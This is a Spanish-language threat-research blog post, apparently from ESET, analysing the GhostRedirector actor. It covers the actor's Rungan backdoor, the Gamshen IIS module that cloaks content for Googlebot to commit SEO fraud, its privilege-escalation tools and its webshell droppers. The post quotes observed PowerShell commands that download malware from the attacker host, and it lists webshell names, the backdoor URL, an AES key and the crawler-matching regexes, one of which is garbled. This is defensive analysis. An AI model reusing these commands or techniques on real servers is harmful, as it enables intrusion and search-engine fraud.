GhostRedirector envenena servidores Windows para manipular resultados SEO en Google

El equipo de investigación de ESET ha identificado un nuevo actor de amenazas, al que hemos llamado GhostRedirector, que comprometió al menos 65 servidores Windows principalmente en Brasil, Tailandia y Vietnam. GhostRedirector utilizó dos herramientas personalizadas no documentadas previamente: un backdoor pasivo en C++ al que denominamos Rungan, y un módulo malicioso de Internet Information Services (IIS) al que llamamos Gamshen.

Mientras que Rungan tiene la capacidad de ejecutar comandos en un servidor comprometido, el propósito de Gamshen es proporcionar fraude SEO (Search Engine Optimization) como servicio, es decir, manipular los resultados de los motores de búsqueda, aumentando el ranking de páginas de un sitio web objetivo configurado. Aunque Gamshen sólo modifica la respuesta cuando la solicitud procede de Googlebot -es decir, no sirve contenido malicioso ni afecta de otro modo a los visitantes habituales de los sitios web-, la participación en el esquema de fraude SEO puede dañar la reputación del sitio web anfitrión comprometido al asociarlo con técnicas SEO fraudulentas.

IIS (Internet Information Services) es el software de servidor web Windows de Microsoft, que tiene una arquitectura modular que admite dos tipos de extensiones: nativa (C++ DLL) y gestionada (.NET assembly). Existen diferentes tipos de malware que pueden abusar de esta tecnología; nuestro artículo técnico 2021 Anatomía del malware IIS nativo ofrece una visión profunda de los tipos de amenazas IIS nativas y su arquitectura. Gamshen entra en la categoría de troyano con el objetivo principal de facilitar el fraude SEO, similar a IISerpent, que documentamos anteriormente.

Además de Rungan y Gamshen, GhostRedirector también utiliza una serie de otras herramientas personalizadas, así como los exploits públicamente conocidos EfsPotato y BadPotato, para crear un usuario con privilegios en el servidor que puede utilizarse para descargar y ejecutar otros componentes maliciosos con privilegios superiores, o utilizarse como alternativa en caso de que el backdoor Rungan u otras herramientas maliciosas se eliminen del servidor comprometido. Creemos, con un nivel de confianza medio, que detrás de estos ataques se encuentra un actor de amenazas alineado con China. En este blogpost ofrecemos información sobre el arsenal utilizado por GhostRedirector para comprometer a sus víctimas.

Puntos clave de este blogpost:

• Hemos observado al menos 65 servidores Windows comprometidos en junio de 2025.
• Las víctimas se encuentran principalmente en Brasil, Tailandia y Vietnam.
• Las víctimas no están relacionadas con un sector específico, sino con varios, como seguros, sanidad, comercio minorista, transporte, tecnología y educación.
• GhostRedirector ha desarrollado un nuevo backdoor C++, Rungan, capaz de ejecutar comandos en el servidor de la víctima.
• GhostRedirector ha desarrollado un módulo IIS nativo malicioso, Gamshen, que puede realizar fraude SEO; creemos que su propósito es promocionar artificialmente varios sitios web de juegos de azar.
• GhostRedirector se basa en exploits públicos como BadPotato o EfsPotato para escalar privilegios en servidores comprometidos.
• Basándonos en diversos factores, llegamos a la conclusión, con un nivel de confianza medio, de que detrás de estos ataques se encuentra un actor de amenazas desconocido hasta ahora y alineado con China. Lo hemos denominado GhostRedirector.

Atribución

No hemos podido atribuir este ataque a ningún grupo conocido, por lo que hemos acuñado el nuevo nombre GhostRedirector para agrupar todas las actividades documentadas en esta entrada de blog. Estas actividades comenzaron en diciembre de 2024, pero hemos podido descubrir otras muestras relacionadas que nos llevan a creer que GhostRedirector lleva activo al menos desde agosto de 2024.

GhostRedirector cuenta con un arsenal que incluye el backdoor pasivo C++ Rungan, el troyano malicioso IIS Gamshen y una variedad de otras utilidades. Hemos agrupado estas herramientas por:

• su presencia en el mismo servidor comprometido en el mismo periodo de tiempo,
• un servidor compartido, y
• similitudes en las rutas PDB de varias herramientas GhostRedirector, como se explica a continuación.

Creemos con confianza media que GhostRedirector es un actor de amenazas alineado con China, basándonos en los siguientes factores:

• varias muestras de herramientas de GhostRedirector tienen cadenas chinas codificadas,
• en el ataque se utilizó un certificado de firma de código emitido por una empresa china, y
• una de las contraseñas de los usuarios creados por GhostRedirector en el servidor comprometido contiene la palabra huang, que en chino significa amarillo.

GhostRedirector no es el primer caso conocido de un actor de amenazas alineado con China que se dedica al fraude SEO a través de módulos IIS maliciosos. El año pasado, Cisco Talos publicó un blog sobre un actor de amenazas alineado con China llamado DragonRank que lleva a cabo fraude SEO. En ambos ataques hay cierto solapamiento en la geolocalización de las víctimas (Tailandia, India y Países Bajos) y en los sectores (sanidad, transporte y TI). Sin embargo, es probable que se tratara de ataques oportunistas, que explotaban el mayor número posible de servidores vulnerables, en lugar de dirigirse a un conjunto específico de entidades. Aparte de estas similitudes, no tenemos motivos para creer que DragonRank y GhostRedirector estén relacionados, por lo que rastreamos estas actividades por separado.

Victimología

La Figura 1 muestra un mapa de calor de los países afectados, combinando datos de dos fuentes:

• La telemetría de ESET, donde detectamos estos ataques entre diciembre de 2024 y abril de 2025, y
• nuestro escaneo de Internet de junio de 2025, que ejecutamos para comprender mejor la escala del ataque y que nos permitió identificar víctimas adicionales.

Notificamos el compromiso a todas las víctimas que identificamos a través de nuestro escaneado de Internet.

Con toda la información recopilada, descubrimos que al menos 65 servidores Windows se habían visto comprometidos en todo el mundo. La mayoría de los servidores afectados se encuentran en Brasil, Perú, Tailandia, Vietnam y Estados Unidos. Nótese que la mayoría de los servidores comprometidos ubicados en EE.UU. parecen haber sido alquilados a empresas con sede en países de la lista anterior. Creemos que GhostRedirector estaba más interesado en atacar a víctimas de Sudamérica y el sur de Asia.

Además, observamos un pequeño número de casos en:

• Canadá,
• Finlandia,
• India,
• países Bajos,
• filipinas y
• Singapur.

GhostRedirector no parece estar interesado en un vertical o sector concreto; hemos visto víctimas en sectores como la educación, la sanidad, los seguros, el transporte, la tecnología y el comercio minorista.

Acceso inicial

Basándonos en la telemetría de ESET, creemos que GhostRedirector obtiene acceso inicial a sus víctimas explotando una vulnerabilidad, probablemente una inyección SQL. A continuación, utiliza PowerShell para descargar varias herramientas maliciosas, todas desde el mismo servidor, 868id[.]com. En algunos casos, hemos visto a los atacantes aprovechar un LOLBin diferente, CertUtil, para el mismo propósito.

Esta conjetura se apoya en nuestra observación de que la mayoría de las ejecuciones no autorizadas de PowerShell se originaron a partir del binario sqlserver.exe, que contiene un procedimiento almacenado xp_cmdshell que puede utilizarse para ejecutar comandos en una máquina.

Los siguientes son ejemplos de comandos que detectamos que se ejecutaban en los servidores comprometidos:

• cmd.exe /d /s /c " powershell curl https://xzs.868id[.]com/EfsNetAutoUser_br.exe -OutFile C:\ProgramData\EfsNetAutoUser_br.exe"
• cmd.exe /d /s /c " powershell curl http://xz.868id[.]com/EfsPotato_sign.exe -OutFile C:\ProgramData\EfsPotato_sign.exe"
• cmd.exe /d /s /c "powershell curl https://xzs.868id[.]com/link.exe -OutFile C:\ProgramData\link.exe"
• powershell curl https://xzs.868id[.]com/iis/br/ManagedEngine64_v2.dll -OutFile C:\ProgramData\Microsoft\DRM\logManagedEngine64.dll
• powershell curl https://xzs.868id[.]com/iis/IISAgentDLL.dll -OutFile C:\ProgramData\Microsoft\DRM\log\miniscreen.dll

También descubrimos que GhostRedirector instaló GoToHTTP en el servidor web infectado, después de descargarlo del mismo servidor. GoToHTTP es una herramienta benigna que permite establecer una conexión remota a la que se puede acceder desde un navegador.

GhostRedirector utilizó el directorio C:\ProgramData\ para instalar su malware, en particular para el backdoor C++ y el troyano IIS utilizan el directorio C:\ProgramData\Microsoft\DRM\log.

Resumen del ataque

En la Figura 2 se muestra un resumen del ataque. Los atacantes comprometen un servidor Windows, descargan y ejecutan varias herramientas maliciosas: una herramienta de escalada de privilegios, malware que lanza múltiples webshells, el backdoor pasivo C++ Rungan, o el troyano IIS Gamshen. El objetivo de las herramientas de escalada de privilegios es crear un usuario privilegiado en el grupo de administradores, de modo que GhostRedirector pueda aprovechar esta cuenta para ejecutar operaciones privilegiadas, o como alternativa en caso de que el grupo pierda el acceso al servidor comprometido.

Exploit públicos realizando escalada de privilegios

Como parte de su arsenal, GhostRedirector creó varias herramientas que aprovechan la táctica de escalada local de privilegios(LPE), probablemente basadas en los exploits públicos EfsPotato y BadPotato. Casi todas las muestras analizadas estaban ofuscadas con .NET Reactor, con múltiples capas de ofuscación. Algunas de las muestras estaban firmadas válidamente con un certificado de firma de código emitido por TrustAsia RSA Code Signing CA G3, a 深圳市迪元素科技有限公司 (Shenzhen Diyuan Technology Co., Ltd.), y con una huella digital de BE2AC4A5156DBD9FFA7A9F053F8FA4AF5885BE3C.

El objetivo principal de estas muestras era crear o modificar una cuenta de usuario en el servidor comprometido y añadirla al grupo Administradores.

Durante nuestro análisis, extrajimos de las muestras analizadas los siguientes nombres de usuario que se utilizaron en la creación de estos usuarios administradores maliciosos.

• MysqlServiceEx
• MysqlServiceEx2
• Admin

La figura 3 muestra el código descompilado utilizado por estas muestras para crear un usuario tras la explotación exitosa de LPE. La contraseña se ha eliminado por motivos de seguridad.

Como se puede ver en la Figura 3, estas herramientas de escalada de privilegios utilizan una clase personalizada de C# llamada CUserHelper. Esta clase se implementa en una DLL denominada Common.Global.DLL (SHA-1: 049C343A9DAAF3A93756562ED73375082192F5A8), que hemos denominado Comdai y que estaba incrustada en las muestras analizadas. Creemos que Comdai fue creado por los mismos desarrolladores que el resto del arsenal de GhostRedirector, basándonos en el patrón compartido en sus respectivas rutas PDB - véase la subcadena x5 repetida como se muestra en la Tabla 1, que es compartida entre Rungan, Gamshen y las herramientas de escalada de privilegios.

Tabla 1. Cadenas PDB Cadenas PDB recopiladas de las herramientas GhostRedirector

La Tabla 2 proporciona una visión general de las clases importantes implementadas en Comdai que son utilizadas por las diversas herramientas de escalada de privilegios de GhostRedirector, junto con la descripción del comportamiento de la clase. Nótese la clase ExeHelper, que proporciona una función para ejecutar un archivo llamado link.exe - GhostRedirector utilizó el mismo nombre de archivo para desplegar la herramienta GoToHTTP.

Obsérvense también las capacidades de tipo backdoor, que incluyen comunicación de red, ejecución de archivos, listado de directorios y manipulación de servicios y claves del registro de Windows. Aunque no hemos observado que estos métodos sean utilizados por ningún componente conocido de GhostRedirector, esto demuestra que Comdai es una herramienta versátil que puede soportar varias fases del ataque.

Tabla 2. Clases implementadas en Comdai Clases implementadas en Comdai

Algunas excepciones a la regla

Descubrimos una muestra (SHA-1: 21E877AB2430B72E3DB12881D878F78E0989BB7F) que utilizaba el mismo certificado, subida a VirusTotal en agosto de 2024, que creemos que está relacionada con el arsenal de GhostRedirector, aunque no vimos que se utilizara durante esta campaña. Esta suposición se basa en el comportamiento de la muestra, que intenta abrir un archivo de texto y enviar su contenido a una URL codificada. Para ello, la muestra contiene una DLL de Comdai incrustada e invoca la clase HttpHelper de Comdai C#, que tiene una URL codificada que es https://www.cs01[.]shop, el mismo dominio mencionado en la Tabla 2.

También descubrimos algunas herramientas de escalada de privilegios que difieren un poco del comportamiento mencionado anteriormente.

Por ejemplo, en un caso (SHA-1: 5A01981D3F31AF47614E51E6C216BED70D921D60), en lugar de crear un nuevo usuario, cambia la contraseña de un usuario Guest existente por una codificada en el malware y luego, utilizando la técnica de secuestro de RID, intenta añadir este usuario a los grupos de administradores.

En otro caso (SHA-1: 9DD282184DDFA796204C1D90A46CAA117F46C8E1), la herramienta no sólo crea un nuevo usuario administrador, sino que también instala múltiples webshells en una ruta específica en los servidores de la víctima, proporcionada manualmente por GhostRedirector como argumento a la herramienta.

Estas webshells se incrustan en los recursos de la muestra en texto claro, y los nombres son hardcoded; los nombres que vimos utilizados son:

• C1.php
• Cmd.aspx
• Error.aspx
• K32.aspx
• K64.aspx
• LandGrey.asp

Zunput, un recopilador de información de sitios web más dropper de webshell

Otra herramienta interesante utilizada por GhostRedirector tenía el nombre de archivo SitePuts.exe. Esta muestra (SHA-1: EE22BA5453ED577F8664CA390EB311D067E47786), a la que hemos llamado Zunput, también está desarrollada con .NET Framework y firmada con el certificado mencionado anteriormente; lee el sistema de configuración de IIS en busca de sitios web configurados y obtiene la siguiente información sobre ellos

• ruta física en el servidor,
• nombre, y
• para cada sitio, los siguientes atributos:

  ○ protocolo

  ○ dirección IP, y

  ○ nombre de host

Una vez recopilada la información, Zunput comprueba la existencia de la ruta física en el servidor y también verifica que el directorio contenga al menos un archivo con la extensión .php,.aspx o .asp. De esta forma, Zunput sólo se dirige a sitios web activos capaces de ejecutar contenido dinámico - sólo en esos directorios deja caer las webshells incrustadas. Las webshells se incrustan en los recursos de la muestra y para las fechas de cada webshell (creación, modificado, accedido), el malware utiliza la fecha de un archivo existente del directorio.

Las webshells están escritas en ASP, PHP y JavaScript, y los nombres utilizados se seleccionan aleatoriamente de la siguiente lista:

• Xml
• Ajax
• Sync
• Loadapi
• Loadhelp
• Código
• Jsload
• Loadcss
• Cargarjs
• Pop3
• Imap
• Api

Extensiones utilizadas para las webshells:

• .cer
• .pjp
• .asp
• .aspx

La información recopilada durante la ejecución de Zunput se guarda en un archivo llamado log.txt (véase un ejemplo en la Figura 4) en el directorio desde el que se ejecutó. Esta información no es exfiltrada automáticamente por Zunput, pero puede ser obtenida por los atacantes a través de varios métodos; uno de ellos puede ser a través del webshell desplegado mencionado anteriormente.

Payloads finales

Rungan, un backdoor C++ pasivo

Rungan (SHA-1: 28140A5A29EBA098BC6215DDAC8E56EACBB29B69) es un backdoor pasivo C/C++ que hemos visto instalado en C:\ProgramData\Microsoft\DRM\log\miniscreen.dll.

Este backdoor utiliza AES en modo CBC para el descifrado de cadenas. se utiliza 030201090405060708090A0B0C0D0E0F para el IV y la clave, y basándonos en la ruta PDB del malware F:\x5\AvoidRandomKill-main\x64\Release\IISAgentDLL.pdb, creemos que GhostRedirector reutiliza la implementación AES del repositorio AvoidRandomKill.

La principal funcionalidad de este backdoor es registrar una URL hardcoded en texto plano http://+:80/v1.0/8888/sys.html en el servidor comprometido, saltándose IIS abusando de la API del servidor HTTP. A continuación, el backdoor espera una solicitud que coincida con esa URL, luego analiza y ejecuta los comandos recibidos en el servidor comprometido.

Se pueden establecer URL adicionales en un archivo de configuración opcional llamado C:\Windows\Microsoft.NET\Framework64\v2.0.50727\1033\vbskui.dll. Rungan escuchará todas las peticiones entrantes que coincidan con los patrones configurados, y la configuración puede actualizarse mediante un comando backdoor. Para activar el backdoor, cualquier petición HTTP entrante debe contener una combinación específica de parámetros y valores, que están codificados en Rungan.

Una vez que se cumple esta comprobación, Rungan utiliza la acción de parámetros para determinar el comando backdoor, y utiliza los datos del cuerpo de la petición HTTP como parámetros del comando. No se utiliza cifrado o codificación en el protocolo C&C. Las capacidades más notables son la creación de un nuevo usuario o la ejecución de comandos en el servidor de la víctima; en la Tabla 3 se muestra una lista completa de los comandos backdoor.

Tabla 3.Comandos backdoors de Rungan

La Figura 5 y la Figura 6 muestran diferentes ejemplos de peticiones realizadas al malware durante un análisis dinámico utilizando la herramienta postman en un entorno simulado.

Gamshen, módulo IIS malicioso

Desarrollado como una DLL C/C++, Gamshen es un módulo IIS nativo malicioso. La principal funcionalidad de este malware es interceptar las peticiones realizadas al servidor comprometido desde el rastreador del motor de búsqueda Googlebot y, sólo en ese caso, modificar la respuesta legítima del servidor. La respuesta se modifica en función de los datos solicitados dinámicamente al servidor de C&C de Gamshen. De este modo, GhostRedirector intenta manipular el ranking de búsqueda en Google de un sitio web específico de terceros, utilizando técnicas de SEO manipuladoras y turbias, como la creación de backlinks artificiales desde el sitio web legítimo y comprometido hacia el sitio web objetivo. Anteriormente documentamos un caso de un troyano IIS que utilizaba tácticas similares: véase IISerpent: Malware-driven SEO fraud as a service.

Es importante mencionar que un usuario normal que visite el sitio web afectado no vería ningún cambio y no se vería afectado por el comportamiento malicioso, ya que Gamshen no desencadena ninguna de sus actividades maliciosas en peticiones de visitantes normales.

La figura 7 muestra cómo un módulo malicioso que participa en el esquema de fraude SEO de IIS modifica la respuesta legítima de un servidor comprometido cuando se realiza una solicitud desde el rastreador de Google, también conocido como Googlebot.

Para ello, los atacantes han implementado su propio código malicioso para los siguientes manejadores de eventos de IIS:

• OnBeginRequest
• OnPreExecuteRequestHandler
• OnPostExecuteRequestHandler
• OnSendResponse

Cuando el servidor comprometido recibe una petición HTTP, la petición pasa a través de la cadena de procesamiento de peticiones de IIS, que activa estos controladores en varios pasos del proceso - en particular, el controlador OnSendResponse se activa justo antes de que el servidor comprometido envíe la respuesta HTTP. Dado que Gamshen se instala como un módulo IIS, intercepta automáticamente cada solicitud HTTP entrante en estos pasos y realiza tres acciones.

En primer lugar, realiza una serie de validaciones para filtrar únicamente las peticiones HTTP de interés:

• La solicitud debe proceder de un rastreador de Google: o bien el encabezado User-Agent contiene la cadena Googlebot, o bien el Referer contiene la cadena google.com.
• El método HTTP no debe ser POST.
• El recurso solicitado no debe ser una imagen, una hoja de estilo o un recurso estático similar, es decir, no debe tener ninguna de las siguientes extensiones: .jpg, .resx, .png, .jpeg, .bmp, .gif, .ico, .css o .js. Esto es para evitar romper la funcionalidad de la interfaz de usuario.
• La URL debe contener la cadena android_ o coincidir con cualquiera de las siguientes expresiones regulares

  ○ [/]?(android|plays|articles|details|iosapp|topnews|joga)_([0-9_]{6,20})(/|\.\\w+)?

  ○ [/]?(android|plays|articles|details|iosapp|topnews|joga)_([a-zA-Z0-9_]{6,8})\\/([a-zA-Z0-9_]{6,20})(/|\\.\\w+)?

  ○ [/]?(android|plays|articles|details|iosapp|topnews|joga)\/([0-9_]{6,20})(/|\.\w+)?

  ○ [/]?(android|plays|articles|details|iosapp|topnews|joga)\\/([a-zA-Z]{8,10})(/|\.\\w+)?

  ○ [/]?([a-zA-Z0-9]{6,8})\\/([a-zA-Z0-9]{6,8})(/|\\.phtml|\\.xhtml|\\.phtm|\\.shtml)

  ○ [/]?([a-zA-Z0-9_]{14})(/|\\.html|\\.htm)

  ○ [/]?([a-zA-Z0-9]{6})\\/([a-zA-Z0-9]{8})(/|\\.html|\\.htm)

  ○ [/]?([a-z0-9]{6})\\\\\ {8}(/\-zA-Z0-9] {8}(/\-zA-Z0-9]{8}m)

En segundo lugar, Gamshen modifica la respuesta destinada al rastreador del motor de búsqueda con datos obtenidos de su propio servidor de C&C, brproxy.868id[.]com. Hemos observado que se utilizan tres URL con este fin:

• https://brproxy.868id[.]com/index_base64.php?<ORIGINAL_URL>
• https://brproxy.868id[.]com/tz_base64.php?<ORIGINAL_URL>
• https://brproxy.868id[.]com/url/index_base64.php

En todos los casos, se utiliza la siguiente cadena User-Agent codificada: Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html). Se espera una respuesta codificada en base64, que luego se descodifica e inyecta en la respuesta HTTP destinada al rastreador del motor de búsqueda.

Finalmente, en el último paso de la cadena de procesamiento de solicitudes, justo antes de que se envíe la respuesta HTTP, el controlador de eventos OnSendResponse verifica la respuesta para estas solicitudes de rastreo. Si la respuesta tiene el código de estado HTTP 404, es decir, Gamshen no ha podido obtener los datos maliciosos de su servidor de C&C, entonces realiza una redirección a un servidor de C&C diferente: http://gobr.868id[.]com/tz.php.

No pudimos obtener una respuesta de brproxy.868id[.]com o gobr.868id[.]com, pero creemos que los datos apoyan técnicas de SEO turbias -como el relleno de palabras clave, la inserción de backlinks maliciosos- o, en el caso de la redirección, hacer que el motor de búsqueda asocie el sitio web comprometido con el sitio web objetivo de terceros, envenenando así el índice de búsqueda.

Sin embargo, pudimos pivotar sobre esos dominios en VirusTotal y encontrar imágenes relacionadas - en este caso, imágenes publicitando una aplicación de juegos de azar para usuarios de habla portuguesa. Creemos que este sitio web es el beneficiario del esquema de fraude SEO, facilitado por este módulo IIS malicioso - Gamshen probablemente intenta comprometer tantos sitios web como sea posible y abusar de su reputación para dirigir tráfico a este sitio web de terceros.

La Figura 8 y la Figura 9 muestran dos imágenes potencialmente utilizadas por GhostRedirector en su esquema de fraude SEO.

Conclusión

En este blogpost, hemos presentado un actor de amenazas previamente desconocido y alineado con China, GhostRedirector, y su kit de herramientas para comprometer y abusar de servidores Windows. Además de permitir la ejecución remota de comandos en los servidores comprometidos, GhostRedirector también despliega un módulo IIS malicioso, Gamshen, diseñado para manipular los resultados de búsqueda de Google mediante tácticas de SEO fraudulentas. Gamshen abusa de la credibilidad de los sitios web alojados en el servidor infectado para promocionar un sitio web de terceros dedicado al juego, que podría ser un cliente de pago que participa en un fraude de SEO como servicio.

GhostRedirector también demuestra persistencia y resistencia operativa al desplegar múltiples herramientas de acceso remoto en el servidor comprometido, además de crear cuentas de usuario falsas, todo ello para mantener el acceso a largo plazo a la infraestructura comprometida.

Las recomendaciones de mitigación pueden encontrarse en nuestro exhaustivo libro blanco. Para cualquier consulta, o para realizar envíos de muestras relacionadas con el tema, póngase en contacto con nosotros en threatintel@eset.com.

IoCs

En nuestro repositorio de GitHub encontrará una lista completa de indicadores de compromiso (IoC) y muestras.

Archivos

Red

Técnicas ATT&CK de MITRE

Esta tabla se ha elaborado utilizando la versión 17 del marco MITRE ATT&CK.